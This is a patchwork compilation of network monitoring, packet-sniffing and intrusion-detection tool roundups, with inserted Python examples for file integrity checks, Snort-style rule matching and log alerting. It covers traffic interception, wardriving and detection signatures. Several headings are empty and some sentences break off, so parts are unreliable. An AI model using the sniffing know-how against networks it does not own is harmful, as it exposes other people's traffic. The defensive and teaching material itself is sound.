Website: https://www.nagios.com/products/nagios-network-analyzer/
Pros: Comprehensive dashboard
6. Capsa Free
Recommended freeware utility for LAN analysis
Capsa Free is a freeware utility for Ethernet monitoring, troubleshooting and analysis. It offers near real-time packet analysis, capture and automated diagnosis for both LAN and WLAN, with built-in functionality such as detailed packet decoding and comprehensive examination of the entire network.
Capsa Free can identify and analyse hundreds of network protocols, and provides custom reporting, e-mail monitoring and TCP timing sequence charts for 24/7 network monitoring.
You can also design your own dashboard with the parameters and services you need to analyse real-time traffic flow, and administrators are free to customise alarm triggers.
Price: Capsa Free is a freeware utility and can be downloaded from the links provided below.
Download Links:
http://www.colasoft.com/download/products/capsa_free.php
Website:
http://www.colasoft.com/capsa-free/
7. Wireshark
A freeware tool recommended for small and medium enterprise networks
Wireshark is a well-known utility which needs no introduction; almost every network specialist knows it. This freeware application is widely used for network monitoring and analysis at a microscopic level.
This tool offers online or offline deep inspection of a large number of protocols and can be installed on any standard platform such as Windows, Linux, OS X, Solaris, etc. It can capture data from various sources including Ethernet, WLAN, WAN and many others. Captured data can be accessed via the GUI or via the TTY-mode TShark utility.
Most network instructors use Wireshark in their training programs to capture packets and demonstrate packet inspection, giving their students a better understanding of packet flow.
Website:
https://www.Wireshark.org/
Download link:
https://www.Wireshark.org/download.html
Pros: Read/Write support for various capture file formats such as tcpdump, Cisco Secure IDS iplog, Network General Sniffer, etc.
Source and Destination Autonomous Systems with the most network flows
Price: To find pricing information for the Professional edition (for 1-9 devices) or Enterprise edition (unlimited devices), follow this link: http://www.caligare.com/netflow/order.php
Or, download a free version at http://www.caligare.com/netflow/free_netflow.php
Website: http://www.caligare.com/netflow/caligare_flow_inspector.php
AirPcap Classic can capture and analyse low-level 802.11b/g wireless traffic.
Website: https://support.riverbed.com/content/support/software/steelcentralnpm/airpcap.html
TOP 20
1. Microsoft Network Monitor
Microsoft Network Monitor is a packet analyzer that allows you to capture, view and
analyze network traffic. This tool is handy for troubleshooting network problems and
applications on the network. Main features include support for over 300 public and
Microsoft proprietary protocols, simultaneous capture sessions, a Wireless Monitor
Mode and sniffing of promiscuous mode traffic, amongst others.
When you launch Microsoft Network Monitor, choose which adapter to bind to from
the main window and then click New Capture to initiate a new capture tab. Within
the Capture tab, click Capture Settings to change filter options, adapter options, or
global settings accordingly and then hit Start to initiate the packet capture process.
2. Nagios
Nagios is a powerful network monitoring tool that helps you to ensure that your critical
systems, applications and services are always up and running. It provides features
such as alerting, event handling and reporting. The Nagios Core is the heart of the
application that contains the core monitoring engine and a basic web UI. On top of
the Nagios Core, you are able to implement plugins that will allow you to monitor
services, applications, and metrics, a chosen frontend as well as add-ons for data
visualisation, graphs, load distribution, and MySQL database support, amongst
others.
Tip: If you want to try out Nagios without needing to install and configure it from scratch, download Nagios XI and enable the free version. Nagios XI is the preconfigured enterprise-class version built upon Nagios Core and is backed by a commercial company that offers support and additional features such as more plugins and advanced reporting.
Note: The free version of Nagios XI is ideal for smaller environments and will monitor up to seven nodes.
Once you've installed and configured Nagios, launch the Web UI and begin to configure host groups and service groups. Once Nagios has had some time to monitor the status of the specified hosts and services, it can start to paint a picture of what the health of your systems looks like.
3. OpenNMS
OpenNMS is an open source enterprise grade network management application that
offers automated discovery, event and notification management, performance
measurement, and service assurance features. OpenNMS includes a client app for
the iPhone, iPad or iPod Touch for on-the-go access, giving you the ability to view
outages, nodes, alarms and add an interface to monitor.
Once you have logged in to the OpenNMS web UI, use the dashboard to get a quick snapshot view of any outages, alarms or notifications. You can drill down and get more information about any of these sections from the Status drop-down menu. The Reports section allows you to generate reports to send by e-mail or download as a PDF.
4. Advanced IP Scanner
Advanced IP Scanner is a fast and easy-to-use network scanner that detects any network devices (including wireless devices such as mobile phones, printers and Wi-Fi routers) on your network. It allows you to connect to common services such as HTTP, FTP and shared folders if they are enabled on the remote machine. You are also able to wake up and shut down remote computers.
The installer allows you to fully install the application on your machine or run the
portable version. When you launch Advanced IP Scanner, start by going to Settings >
Options to select which resources to scan and how fast/accurate you want the results
to be. You can then choose which subnet to scan and proceed with pressing the
Scan button. Once the scan is complete, expand the results to see which resources
you are able to connect to for each discovered device.
5. Capsa Free
Capsa Free is a network analyzer that allows you to monitor network traffic,
troubleshoot network issues and analyze packets. Features include support for over
300 network protocols (including the ability to create and customize protocols), MSN
and Yahoo Messenger filters, email monitor and auto-save, and customizable reports
and dashboards.
When you launch Capsa, choose the adapter you want it to bind to and click Start to
initiate the capture process. Use the tabs in the main window to view the dashboard,
a summary of the traffic statistics, the TCP/UDP conversations, as well as packet
analysis.
6. Fiddler
Fiddler is a web debugging tool that captures HTTP traffic between chosen
computers and the Internet. It allows you to analyze incoming and outgoing data to
monitor and modify requests and responses before they hit the browser. Fiddler gives
you extremely detailed information about HTTP traffic and can be used for testing the
performance of your websites or security testing of your web applications (e.g. Fiddler
can decrypt HTTPS traffic).
When you launch Fiddler, HTTP traffic will start to be captured automatically. To
toggle traffic capturing, hit F12. You can choose which processes you wish to capture
HTTP traffic for by clicking on All Processes in the bottom status bar, or by dragging
the Any Process icon from the top menu bar onto an open application.
7. NetworkMiner
NetworkMiner captures network packets and then parses the data to extract files and images, helping you to reconstruct the actions a user has taken on the network; it can also do this by parsing a pre-captured PCAP file. You can enter keywords which will be highlighted as network packets are being captured. NetworkMiner is classed as a Network Forensic Analysis Tool (NFAT) that can obtain information such as hostname, operating system and open ports from hosts.
In the example above, I set NetworkMiner to capture packets, opened a web browser
and searched for soccer as a keyword on Google Images. The images displayed in
the Images tab are what I saw during my browser session.
When you load NetworkMiner, choose a network adapter to bind to and hit the Start
button to initiate the packet capture process.
8. Pandora FMS
Pandora FMS is a performance monitoring, network monitoring and availability
management tool that keeps an eye on servers, applications and communications. It
has an advanced event correlation system that allows you to create alerts based on
events from different sources and notify administrators before an issue escalates.
When you log in to the Pandora FMS Web UI, start by going to the Agent detail and Services node in the left-hand navigation pane. From here, you can configure monitoring agents and services.
9. Zenoss Core
Zenoss Core is a powerful open source IT monitoring platform that monitors
applications, servers, storage, networking and virtualization to provide availability and
performance statistics. It also has a high performance event handling system and an
advanced notification system.
When you log in to the Zenoss Core Web UI for the first time, you are presented with a two-step wizard that asks you to create user accounts and add your first few devices/hosts to monitor. You are then taken directly to the Dashboard tab. Use the Dashboard, Events, Infrastructure, Reports and Advanced tabs to configure Zenoss Core and review reports and events that need attention.
10. PRTG Network Monitor
When you launch PRTG Network Monitor, head straight to the configuration wizard to get started. This wizard will run you through the main configuration settings required to get the application up and running, including adding servers to monitor and choosing which sensors to use.
11. The Dude
When you launch The Dude, you first choose to connect to a local or remote network and specify credentials accordingly. Click Settings to configure options for SNMP, Polling, Syslog and Reports.
12. Splunk
Splunk is a data collection and analysis platform that allows you to monitor, gather and analyze data from different sources on your network (e.g. event logs, devices, services, TCP/UDP traffic, etc.). You can set up alerts to notify you when something is wrong or use Splunk's extensive search, reporting and dashboard features to make the most of the collected data. Splunk also allows you to install Apps to extend system functionality.
Note: When you first download and install Splunk, it automatically installs the
Enterprise version for you to trial for 60 days before switching to the Free version. To
switch to the Free version straight away, go to Manager > Licensing.
When you log in to the Splunk web UI for the first time, add a data source and configure your indexes to get started. Once you have done this you can then create reports, build dashboards, and search and analyze data.
When you execute the application, go to Tools > Preferences to configure Scanning
and Port options, then go to Tools > Fetchers to choose what information to gather
from each scanned IP address.
14. Icinga 2
Icinga is a Linux-based, fully open source monitoring application which checks the availability of network resources and immediately notifies users when something goes down. Icinga provides business intelligence data for in-depth analysis and a powerful command line interface.
When you first launch the Icinga web UI, you are prompted for credentials. Once you've authenticated, use the navigation menu on the left-hand side to manage the configuration of hosts, view the dashboard and reports, see a history of events, and more.
15. Total Network Monitor
When you launch Total Network Monitor, go to Tools > Scan Wizard to have the wizard scan a specified network range automatically and assign the discovered hosts to a group. Alternatively, create a new group manually to start adding devices/hosts individually.
16. NetXMS
Once you log in to NetXMS you need to first go to the Server Configuration window to change a few settings that depend on your network requirements (e.g. changing the number of data collection handlers or enabling network discovery). You can then run the Network Discovery option for NetXMS to automatically discover devices on your network, or add new nodes by right-clicking on Infrastructure Services and selecting Tools > Create Node.
17. Xymon
Xymon is a web-based system designed to run on Unix-based systems that
allows you to dive deep into the configuration, performance and real-time statistics of
your networking environment. It offers monitoring capabilities with historical data,
reporting and performance graphs.
Once you've installed Xymon, the first place you need to go is the hosts.cfg file to add the hosts that you are going to monitor. Here, you add information such as the host IP address, the network services to be monitored, what URLs to check, and so on.
When you launch the Xymon Web UI, the main page lists the systems and services
being monitored by Xymon. Clicking on each system or service allows you to bring up
status information about a particular host and then drill down to view specific
information such as CPU utilization, memory consumption, RAID status, etc.
18. WirelessNetView
WirelessNetView is a lightweight utility (available as a standalone executable or
installation package) that monitors the activity of reachable wireless networks and
displays information related to them, such as SSID, Signal Quality, MAC Address,
Channel Number, Cipher Algorithm, etc.
19. Wi-Fi Inspector
Once you launch Wi-Fi Inspector and choose an adapter, a list of available Wi-Fi connections is displayed in the Networks pane. Details of your current Wi-Fi connection are displayed in the top right-hand corner. Pretty much everything happens from the top ribbon bar: you can run a test, change the layout, edit settings, refresh connections, etc.
20. Wireshark
This list wouldn't be complete without the ever popular Wireshark. Wireshark is an interactive network protocol analyzer and capture utility. It provides for in-depth inspection of hundreds of protocols and runs on multiple platforms.
When you launch Wireshark, choose which interface you want to bind to and click the green shark fin icon to get going. Packets will immediately start to be captured. Once you've collected what you need, you can export the data to a file for analysis in another application or use the built-in filter to drill down and analyze the captured packets at a deeper level from within Wireshark itself.
SNIFFING TOOLS:
Top 10 Data/Packet Sniffing and Analyzer Tools for Hackers
1: Wireshark
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic
open source network protocol analyzer for Unix and Windows. It allows you to examine
data from a live network or from a capture file on disk. You can interactively browse the
capture data, delving down into just the level of packet detail you need. Wireshark has
several powerful features, including a rich display filter language and the ability to view
the reconstructed stream of a TCP session. It also supports hundreds of protocols and
media types. A tcpdump-like console version named tethereal is included. One word of
caution is that Ethereal has suffered from dozens of remotely exploitable security holes,
2: Tcpdump
Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene,
and many of us continue to use it frequently. It may not have the bells and whistles
(such as a pretty GUI or parsing logic for hundreds of application protocols) that
Wireshark has, but it does the job well and with fewer security holes. It also requires
fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump.
TCPDump is the source of the Libpcap/WinPcap packet capture library, which is used
by Nmap among many other tools.
4: Kismet
Kismet is a console (ncurses) based 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating,
5: Dsniff
6: NetStumbler
Netstumbler is the best known Windows tool for finding open wireless access points
(wardriving). They also distribute a WinCE version for PDAs and such
named Ministumbler. The tool is currently free but Windows-only and no source code is
provided. It uses a more active approach to finding WAPs than passive sniffers such
as Kismet or KisMAC.
7: Ettercap
Ettercap is a terminal-based network sniffer/interceptor/logger for Ethernet LANs. It supports active and passive dissection of many protocols (even encrypted ones, like SSH and HTTPS). Data injection into an established connection and filtering on the fly are also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.
8: Ngrep
ngrep strives to provide most of GNU grep's common features, applying them to the network layer. ngrep is a pcap-aware tool that allows you to specify extended regular or hexadecimal expressions to match against the data payloads of packets. It currently recognizes TCP, UDP and ICMP across Ethernet, PPP, SLIP, FDDI, Token Ring and null interfaces, and understands BPF filter logic in the same fashion as more common packet sniffing tools, such as tcpdump and snoop.
9: Ntop
Ntop shows network usage in a way similar to what top does for processes. In interactive mode, it displays the network status on the user's terminal. In Web mode, it acts as a Web server, creating an HTML dump of the network status. It sports a NetFlow/sFlow emitter/collector, an HTTP-based client interface for creating ntop-centric monitoring applications, and RRD for persistently storing traffic statistics.
10: EtherApe
EtherApe is a graphical network monitor for Unix modeled after etherman.
Featuring link layer, IP and TCP modes, EtherApe displays network activity graphically
with a color coded protocols display. Hosts and links change in size with traffic. It
supports Ethernet, FDDI, Token Ring, ISDN, PPP and SLIP devices. It can filter traffic to
be shown, and can read traffic from a file as well as live from the network.
3. SNORTING:
4. IDS and IPS:
If an IPS is a control tool, then an IDS is a visibility tool. Intrusion Detection Systems sit off to the side of the network, monitoring traffic at many different points, and provide visibility into the security posture of the network.
January 13, 2014
Whether you need to monitor hosts or the networks connecting them to identify the
latest threats, there are some great open source intrusion detection (IDS) tools available
to you.
I won't bore you with how long I've been doing network security, but I've been doing
packet analysis before any of these tools even existed. Tcpdump and me, good buddies.
I've deployed and managed virtually every commercial and open source IDS tool out
there. In fact my ardor for packets landed me a job analyzing network traffic for Fortune
50 companies while working at a major MSSP I'm sure everyone has heard of. Enough
about me, let's get to it.
Network IDS - These tools operate by inspecting traffic that occurs between hosts. If you aren't already running network IDS, you should be. There are two types of Network IDS: signature detection and anomaly detection.
In a signature-based IDS, there are rules or patterns of known malicious traffic that it is
looking for. Once a match to a signature is found it generates an alert. These alerts can
turn up issues such as malware, scanning activity, attacks against servers and much
more.
With anomaly-based IDS, the payload of the traffic is far less important than the activity
that generated it. An anomaly-based IDS tool relies on baselines rather than signatures.
It will look for unusual activity that deviates from statistical averages of previous
activities or activity that has been previously unseen. Perhaps a server is sending out
more HTTP activity than usual or a new host has been seen inside your DMZ.
Both are typically deployed in the same manner, though one could make the case you
could easily (and people have) create an anomaly-based IDS on externally-collected
netflow data or similar traffic information.
Looking for attacks isn't the only use case for IDS; you can also use it to find violations of network policy. IDS will tell you an employee was using Gtalk, uploading to Box, or spending all their time watching Hulu instead of working.
Snort
Ah, the venerable piggy that loves packets. I'm sure everyone remembers 1998 as the
year a version of Windows came out but it was also the year that Martin Roesch first
released Snort. Though then it really wasn't a true IDS, its destiny had been written.
Since then it has become the de facto standard for IDS and eventually IPS (thanks to community effort!). It's important to note that Snort has no real GUI or easy-to-use administrative console. Lots of other open source tools have been created to help out, notably Snorby and others like BASE and Sguil.
Suricata
What's the only reason for not running Snort? If you're using Suricata instead. Though Suricata's architecture is different from Snort's, it behaves the same way as Snort and can use the same signatures. What's great about Suricata is what else it's capable of over Snort. It does so much more that it probably deserves a dedicated post of its own. Let's run down a few of them:
Multi-Threaded - Snort runs with a single thread, meaning it can only use one CPU (core) at a time. Suricata can run many threads so it can take advantage of all the CPUs/cores you have available. There has been much contention on whether this is
File Extraction - Someone downloading malware? You can capture it right from
Logging more than packets - Suricata can grab and log things like TLS/SSL certs, HTTP requests, DNS requests
So much more...
With so many features and capabilities it's no wonder it's the default network IDS inside
USM now.
Bro
Bro, sometimes referred to as Bro-IDS, is a bit different from Snort and Suricata. In a way Bro is both a signature and anomaly-based IDS. Its analysis engine will convert captured traffic into a series of events. An event could be a user logon to FTP, a connection to a website or practically anything. The power of the system is what comes after the event engine, and that's the Policy Script Interpreter. This policy engine has its own language (Bro-Script) and it can do some very powerful and versatile tasks.
If you're an analyst and you've wondered "How can I automate some of my work?" then this is the tool you've been looking for. Want to download files seen on the wire, submit them for malware analysis, notify you if a problem is found, then blacklist the source and shut down the computer of the user who downloaded it? Want to track the usage patterns of a user after they've contacted an IP from a reputation database?
If you're not an analyst then this tool will have a challenging learning curve. Since it was developed as a research tool it didn't initially focus on things like GUIs, usability, and ease of installation. While it does many cool things out of the box, many of those things aren't immediately actionable and may be difficult to interpret.
Summary:
Complicated to set up
Kismet
Just as Snort became the standard for network intrusion detection, Kismet is the baseline for wireless IDS. Wireless IDS deals less with the packet payload and more with strange things happening inside the wireless protocols (mostly 802.11) and functions. WIDS will find unauthorized access points (rogue AP detection), perhaps one created by an employee accidentally (yes, I've seen that) that opens a network up. Perhaps someone has stood up an AP with the same name as your corporate network to perform MITM attacks? Kismet will find all of these. Kismet runs on a variety of platforms, even Android. Besides IDS, Kismet can also be used for more utilitarian things like wireless site surveys or fun activities like wardriving.
Host IDS - Host based IDS systems, or HIDS, work by monitoring activity that is
occurring internally on a host.
HIDS look for unusual or nefarious activity by examining logs created by the operating system, looking for changes made to key system files, tracking installed software, and sometimes examining the network connections a host makes. The first HIDS systems were rather rudimentary, usually just creating MD5 hashes of files on a recurring basis and looking for discrepancies (File Integrity Monitoring). Since then HIDS have grown far more complex and perform a variety of useful security functions. Also, if you need to become compliant with one of the many standards (PCI, ISO, etc.) then HIDS is compulsory.
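As an added example (not code from the post or from OSSEC, Samhain or any other tool named here), this is the file integrity monitoring idea just described: hash every file under a root, keep the baseline somewhere the host cannot rewrite it, and report every discrepancy on the next run. The directory tree, file contents and the three simulated changes are constructed for the demo; SHA-256 stands in for the MD5 the early tools used.

```python
"""File integrity monitoring (FIM) as the early HIDS did it: hash files on a schedule,
keep the baseline off the host, and alert on every discrepancy. Added example; the
directory tree, paths and contents are invented."""
import hashlib
import json
import os
import tempfile


def hash_file(path, chunk=65536):
    """SHA-256 of a file read in chunks (early tools used MD5, which is now collision-prone)."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Map every regular file under root ('/'-separated relative path) to hash, size and mode."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue    # skip symlinks; their targets are hashed under their own path
            st = os.lstat(full)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = {"sha256": hash_file(full), "size": st.st_size,
                         "mode": oct(st.st_mode & 0o7777)}
    return snap


def diff_snapshots(baseline, current):
    """Compare a stored baseline with a fresh snapshot; any difference is worth an alert."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def _write(root, rel, data):
    """Helper for the demo: write a text file at a '/'-separated path under root."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(data)


def demo():
    """Build a tree, take the baseline, simulate three changes, and report the discrepancies."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "etc/passwd", "root:x:0:0:root:/root:/bin/bash\n")
        _write(root, "etc/ssh/sshd_config", "PermitRootLogin no\n")
        _write(root, "var/log/auth.log", "Accepted publickey for alice\n")
        # At this point a real agent ships the baseline to the central server (or signs it),
        # so that an intruder on the host cannot rewrite it to match their changes.
        stored = json.dumps(snapshot(root))
        _write(root, "etc/ssh/sshd_config", "PermitRootLogin yes\n")         # config tampered
        _write(root, "etc/cron.d/new_job", "0 * * * * root /usr/local/bin/job\n")  # file added
        os.remove(os.path.join(root, "var", "log", "auth.log"))                # log destroyed
        return diff_snapshots(json.loads(stored), snapshot(root))
```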
OSSEC
In the realm of full featured Open Source HIDS tools, there is OSSEC and not much else.
Go ahead and google away, I'll wait. The great news is OSSEC is very good at what it
does and it is rather extensible. OSSEC will run on almost any major operating system
and uses a Client/Server based architecture which is very important in a HIDS system.
Since a HIDS could be potentially compromised at the same time the OS is, it's very
important that security and forensic information leave the host and be stored elsewhere
as soon as possible to avoid any kind of tampering or obfuscation that would prevent
detection.
OSSEC's architecture design incorporates this strategy by delivering alerts and logs to a
centralized server where analysis and notification can occur even if the host system is
taken offline or compromised. Another advantage of this architecture is the ability
to centrally manage agents from a single server. Since deployments can range from
one to thousands of installations, the ability to make changes en masse via a central
server is critical for an administrator's sanity.
When discussing OSSEC and other HIDS there is often trepidation about installing an agent or software on critical servers. It should be noted that the OSSEC installation is extremely light (the installer is under 1MB) and that the majority of analysis actually occurs on the server, which means very little CPU is consumed by OSSEC on the host. OSSEC also has the ability to send OS logs to the server for analysis and storage, which is particularly helpful on Windows machines that have no native, cross-platform logging mechanism.
Summary:
Samhain
In comparison to OSSEC, Samhain is the best competition. But it's very much the case
of same but different when making the comparison. Samhain has the same
client/server architecture but it's not beholden to it like OSSEC is. The agent itself has a
variety of output methods, one being a central server but others like Syslog, Email, and
RDBMS which are greatly appreciated.
Another important difference is where the analysis occurs. Unlike OSSEC the processing
occurs on the client itself. While this does give an advantage in terms of processing
speed it could have potential impact on your servers. However, it does put those CPU
cycles to good use as it has a much stronger emphasis on FIM.
Summary:
Harder to install
OpenDLP
OpenDLP isn't really a HIDS system but its functionality makes it worth a mention here. This tool has one goal and that's DLP or Data Loss Prevention. It will scan data while it's "at rest" looking for pieces of data like credit card numbers or SSNs and can be extended with regular expressions to find data that is sensitive to your organization. OpenDLP will look for this data on file systems or even inside databases on both Windows and Linux. It can also perform these scans via an installable agent or without any software installation.
FIM Only
There are quite a few FIM tools that get categorized with HIDS. Some are actively
developed and others haven't been updated in years. Since these tools only perform
one function I won't elaborate much more. A few of these are AIDE, OS
Tripwire and AFick.
Security Onion
If you're interested in trying out some or all of the open source IDS tools from this post
you could save some time and check out Security Onion. It's a distribution of Ubuntu
with everything pre-installed.
Security Onion
Security Onion is an Ubuntu-based Linux distribution for network monitoring and
intrusion detection. The image can be distributed as sensors within the network to
monitor multiple VLANs and subnets, and works well in VMware and virtual
environments. This configuration can be used as an IDS only. It isn't currently supported to be run as an IPS. However, there is the option to run this both as a network and host intrusion-detection deployment, and to utilize services such as Sguil, Bro IDS and OSSEC to perform the IDS functions of the service. The wiki and documentation for the site and software is terrific, and defects and bugs are recorded and reviewed. As great as Security Onion is, however, it still needs more assistance with development, which will most likely happen in time.
OSSEC
OSSEC is an open source host intrusion-detection system (HIDS) that does more than
detect intrusions. Like most open source IDS offerings, there are multiple additional
modules that can be used with the core functionality of IDS. In addition to network
intrusion-detection, the OSSEC client has the ability to perform file integrity
monitoring and rootkit detection with real-time alerts, all of which are centrally
managed with the ability to create different policies, depending on a company's needs.
The OSSEC client runs locally on most operating systems, including Linux versions,
Mac OSX and Windows. It also offers commercial support via Trend Micro's Global
Support Team. This is a very mature offering.
OpenWIPS-NG
OpenWIPS-NG is a free wireless IDS/IPS that relies on a server, sensors and
interfaces. It runs on commodity hardware. Created by the author of Aircrack-NG, this
system uses many of the functions and services already built into Aircrack-NG for
scanning, detection and intrusion prevention. OpenWIPS-NG is modular and allows
an administrator to download plug-ins for additional features. The documentation isn't
as detailed as some systems', but it allows for companies to perform WIPS on a tight
budget.
Suricata
Out of all the IDS/IPS systems that are currently available, Suricata competes most directly with Snort. This system has an architecture that is similar to Snort's, relies on signatures like Snort, and can even use the VRT Snort rules and the same Emerging Threats rule set that Snort itself uses. Being newer than Snort, Suricata still has some catching up to do in this area. If Snort isn't an option in your organization, this is the closest free tool available to run on an enterprise network.
Bro IDS
Bro IDS is similar to Security Onion in that it uses more than IDS rules to determine where attacks are coming from; Bro combines signatures with its own policy scripts that analyse protocol behaviour. At one point it used Snort-based signatures converted into Bro signatures. This is no longer the case, and custom signatures can now be written natively for Bro. The system is well documented and has been around for over 15 years.
Snort has definitely made its presence known through the influence it has over most of the IDS/IPS market, including freeware and open source IDS/IPS. The systems reviewed here all perform IDS/IPS a little differently, but all are suitable free alternatives that companies on a budget can use to better protect their networks.
Snort
This network intrusion detection and prevention system excels at traffic analysis and
packet logging on IP networks. Through protocol analysis, content searching, and
various pre-processors, Snort detects thousands of worms, vulnerability exploit
attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based
language to describe traffic that it should collect or pass, and a modular detection
engine. Also check out the free Basic Analysis and Security Engine (BASE), a web
interface for analyzing Snort alerts.
While Snort itself is free and open source, parent company Sourcefire offers its VRT-certified rules for $499 per sensor per year, along with a complementary product line of software and appliances with more enterprise-level features. Sourcefire also offers a free 30-day delayed rule feed.
Latest release: version 2.9.7.5 on July 23, 2015.
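Both the Suricata entry above and the Snort entry here turn on the shared rule language: a header (action, protocol, addresses, ports, direction) followed by payload options. The following is an added example, not code from Snort, Suricata or this page: a deliberately small matcher that parses the header and the most common options (msg, content, nocase, sid) and evaluates the rules against constructed packets. The packets, rules and sids are made up for illustration; real engines support many more options, address lists, variables and preprocessors.

```python
"""Minimal matcher for Snort/Suricata-style rules (added example, not the engines' code)."""
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed packets (not captured traffic); payload is raw bytes.
SAMPLE_PACKETS = [
    {"proto": "tcp", "src": "10.0.0.5", "sport": 51234, "dst": "192.168.1.10", "dport": 80,
     "payload": b"GET /cgi-bin/PHF HTTP/1.0\r\n"},
    {"proto": "tcp", "src": "10.0.0.7", "sport": 40000, "dst": "192.168.1.10", "dport": 443,
     "payload": b"\x16\x03\x01\x00\xc8"},
    {"proto": "udp", "src": "10.0.0.9", "sport": 5353, "dst": "192.168.1.10", "dport": 53,
     "payload": b"\x00\x00\x01\x00"},
]

# Constructed rules in Snort syntax; sids from 1000000 up are reserved for local rules.
SAMPLE_RULES = [
    'alert tcp any any -> 192.168.1.0/24 80 (msg:"WEB-CGI phf access"; content:"/cgi-bin/phf"; nocase; sid:1000001;)',
    'alert tcp any any -> any 443 (msg:"TLS 1.0 record"; content:"|16 03 01|"; sid:1000002;)',
    'drop udp any any -> any 53 (msg:"DNS to internal resolver"; sid:1000003;)',
]

HEADER_RE = re.compile(
    r"^(?P<action>alert|log|pass|drop|reject)\s+(?P<proto>tcp|udp|icmp|ip)\s+"
    r"(?P<src>\S+)\s+(?P<sport>\S+)\s+->\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)

@dataclass
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    dst: str
    dport: str
    msg: str = ""
    sid: int = 0
    contents: list = field(default_factory=list)   # [bytes, nocase_flag] pairs, in rule order

def _decode_content(text: str) -> bytes:
    """Snort writes binary bytes between pipes as hex, e.g. "|16 03 01|"; the rest is literal."""
    out = bytearray()
    for i, chunk in enumerate(text.split("|")):
        out += bytes.fromhex(chunk) if i % 2 else chunk.encode()
    return bytes(out)

def parse_rule(line: str) -> Rule:
    m = HEADER_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a rule: {line!r}")
    rule = Rule(**{k: m.group(k) for k in ("action", "proto", "src", "sport", "dst", "dport")})
    # Options are ';'-separated "key:value" or bare "key"; nocase modifies the preceding content.
    for raw in (o.strip() for o in m.group("opts").split(";") if o.strip()):
        key, _, val = raw.partition(":")
        key, val = key.strip(), val.strip().strip('"')
        if key == "msg":
            rule.msg = val
        elif key == "sid":
            rule.sid = int(val)
        elif key == "content":
            rule.contents.append([_decode_content(val), False])
        elif key == "nocase" and rule.contents:
            rule.contents[-1][1] = True
    return rule

def _addr_matches(spec: str, addr: str) -> bool:
    # 'any', a single IP or a CIDR; Snort also allows lists, negation and $VARIABLES.
    return spec == "any" or ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)

def _port_matches(spec: str, port: int) -> bool:
    if spec == "any":
        return True
    if ":" in spec:                      # range such as 1024: or 1:1023
        lo, _, hi = spec.partition(":")
        return (int(lo) if lo else 0) <= port <= (int(hi) if hi else 65535)
    return port == int(spec)

def rule_matches(rule: Rule, pkt: dict) -> bool:
    """Header first (cheap), then every content option must be found in the payload."""
    if rule.proto not in ("ip", pkt["proto"]):
        return False
    if not (_addr_matches(rule.src, pkt["src"]) and _port_matches(rule.sport, pkt["sport"])
            and _addr_matches(rule.dst, pkt["dst"]) and _port_matches(rule.dport, pkt["dport"])):
        return False
    for needle, nocase in rule.contents:
        hay = pkt["payload"].lower() if nocase else pkt["payload"]
        if (needle.lower() if nocase else needle) not in hay:
            return False
    return True

def evaluate(rule_lines, packets):
    """Return (sid, action, msg) for each rule that fires on each packet, in packet order."""
    rules = [parse_rule(r) for r in rule_lines]
    return [(r.sid, r.action, r.msg) for pkt in packets for r in rules if rule_matches(r, pkt)]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_RULES, SAMPLE_PACKETS):
        print(hit)
```

The first packet only fires because of the nocase modifier (the request uses upper-case PHF); drop that option and the rule is silent, which is the kind of detail that separates a rule that works in the lab from one that works against real traffic.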
OSSEC
OSSEC HIDS performs log analysis, integrity checking, rootkit detection, time-based alerting and active response. In addition to its IDS functionality, it is commonly used as a SEM/SIM solution. Because of its powerful log analysis engine, ISPs, universities and data centers run OSSEC HIDS to monitor and analyze their firewalls, IDSs, web servers and authentication logs.
Latest release: version 2.8.2 on June 10, 2015.
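The combination the entry lists, log analysis, time-based alerting and active response, is best seen on a concrete burst of events. The following is an added example written for this page, not OSSEC's own code or ruleset: it reproduces the idea behind an OSSEC rule carrying frequency and timeframe (fire when one source produces N matching events within T seconds) and a level threshold above which an active-response script would be launched. The sshd log lines, the rule id and its numbers are constructed for illustration, and the response command is only returned as a string, never executed.

```python
"""Frequency-based alerting and active response in the OSSEC style (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed syslog lines from sshd (not real logs)
SAMPLE_LOG = """\
Jun  1 10:00:01 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 51001 ssh2
Jun  1 10:00:03 web1 sshd[2102]: Failed password for root from 203.0.113.7 port 51002 ssh2
Jun  1 10:00:04 web1 sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51003 ssh2
Jun  1 10:00:09 web1 sshd[2104]: Failed password for root from 203.0.113.7 port 51004 ssh2
Jun  1 10:00:15 web1 sshd[2105]: Failed password for alice from 198.51.100.9 port 40001 ssh2
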